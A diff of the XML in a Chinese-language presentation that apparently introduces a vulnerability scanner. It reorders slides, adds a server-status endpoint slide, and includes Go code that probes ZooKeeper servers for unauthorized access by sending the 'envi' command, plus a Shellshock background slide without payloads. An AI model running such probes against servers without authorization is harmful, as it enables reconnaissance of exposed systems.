--- a/talk.pptx
+++ b/talk.pptx
@@ -15,16 +15,17 @@
     <p:sldId id="273" r:id="rId9"/>
     <p:sldId id="274" r:id="rId10"/>
     <p:sldId id="275" r:id="rId11"/>
-    <p:sldId id="261" r:id="rId12"/>
-    <p:sldId id="268" r:id="rId13"/>
-    <p:sldId id="270" r:id="rId14"/>
-    <p:sldId id="276" r:id="rId15"/>
-    <p:sldId id="277" r:id="rId16"/>
-    <p:sldId id="271" r:id="rId17"/>
-    <p:sldId id="272" r:id="rId18"/>
-    <p:sldId id="269" r:id="rId19"/>
-    <p:sldId id="262" r:id="rId20"/>
-    <p:sldId id="263" r:id="rId21"/>
+    <p:sldId id="278" r:id="rId12"/>
+    <p:sldId id="261" r:id="rId13"/>
+    <p:sldId id="268" r:id="rId14"/>
+    <p:sldId id="270" r:id="rId15"/>
+    <p:sldId id="276" r:id="rId16"/>
+    <p:sldId id="277" r:id="rId17"/>
+    <p:sldId id="271" r:id="rId18"/>
+    <p:sldId id="272" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="262" r:id="rId21"/>
+    <p:sldId id="263" r:id="rId22"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -123,6 +124,11 @@
       </a:defRPr>
     </a:lvl9pPr>
   </p:defaultTextStyle>
+  <p:extLst>
+    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/>
+    </p:ext>
+  </p:extLst>
 </p:presentation>
 </file>
 
@@ -6399,7 +6405,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA2C099-DF49-D845-A9B2-5BCBCD4195B3}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0DAE31-9B9A-4D48-A178-8C028478ACBC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6410,14 +6416,108 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913776" y="618518"/>
+            <a:ext cx="9482828" cy="596508"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>核心模块精讲</a:t>
+              <a:t>服务器状态检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="图片 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B71556-3FB1-E446-9482-B34503D19529}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="115001" y="1215026"/>
+            <a:ext cx="7262829" cy="5788302"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="文本框 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E654DF72-F894-6541-9676-B018DD9F3455}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="7678455" y="1390389"/>
+            <a:ext cx="4108537" cy="3108543"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>调用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>info</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>接口发送</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>get</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>请求，可以查看服务器的内存使用情况，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
+              <a:t>cpu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>占用率，以及服务器信息，如果服务器有突发性的内存上涨或者占用率过高，可通过此接口来判断</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6425,7 +6525,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688000681"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3972821908"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6457,7 +6557,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AD45B8-AA01-AD47-9029-FB3A2B849706}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA2C099-DF49-D845-A9B2-5BCBCD4195B3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6468,434 +6568,14 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="789139" y="275572"/>
-            <a:ext cx="9862785" cy="686518"/>
-          </a:xfrm>
-        </p:spPr>
+        <p:spPr/>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>Zk</a:t>
-            </a:r>
-            <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>弱密码检测</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A29637-D4BD-5345-ACE1-2F0FACF550A2}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1415441" y="1816274"/>
-            <a:ext cx="9862785" cy="4801314"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>func</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> (d *</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zookeeperUnauth</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) Check(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> string, meta </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>plugin.TaskMeta</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) bool {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.TCPSend</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, []byte("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>envi</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>"), 15)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err == nil &amp;&amp; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>strings.Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(string(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>), "Environment") {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      result := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.info</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Sprintf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("zookeeper://%s", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = string(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Remarks</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Sprintf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>未授权访问，</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>%</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>s", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Remarks</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = append(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, result)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return true</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="文本框 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB99DB9-4634-1E48-B326-5CF4257E6E24}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1164921" y="1252603"/>
-            <a:ext cx="9983243" cy="646331"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>这，觉得弱密码检测就是想</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器发送一些默认的密码，如果</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>有了响应，那么就可以判定改</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>zk</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器存在弱密码泄露现象</a:t>
+              <a:t>核心模块精讲</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6903,7 +6583,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2605024454"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688000681"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6935,7 +6615,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AD45B8-AA01-AD47-9029-FB3A2B849706}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6948,8 +6628,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="618518"/>
-            <a:ext cx="10364452" cy="696716"/>
+            <a:off x="789139" y="275572"/>
+            <a:ext cx="9862785" cy="686518"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -6957,22 +6637,22 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Shell</a:t>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>Zk</a:t>
             </a:r>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>破壳检测</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="文本框 6">
+              <a:t>弱密码检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72084524-DB0D-144A-8471-B96E4A90F314}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A29637-D4BD-5345-ACE1-2F0FACF550A2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6981,8 +6661,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913774" y="1315234"/>
-            <a:ext cx="9745876" cy="1938992"/>
+            <a:off x="1415441" y="1816274"/>
+            <a:ext cx="9862785" cy="4801314"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6996,99 +6676,335 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>014</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>年</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>9</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>月</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>24</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>日，一位名叫斯特凡</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>·</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>沙泽拉的安全研究者发现了一个名为“破壳”（</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>Shellshock</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
-              <a:t>，</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>也称为“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>门”或“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>Bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>漏洞”）的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>漏洞。该漏洞如果被渗透，远程攻击者就可以在调用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>shell</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后，这些函数内的代码就可以在调用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
-              <a:t>bash</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-              <a:t>时立即执行。</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="文本框 7">
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>func</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> (d *</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zookeeperUnauth</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) Check(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> string, meta </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>plugin.TaskMeta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) bool {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.TCPSend</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, []byte("</a:t>
+            </a:r>
+            <a:r>
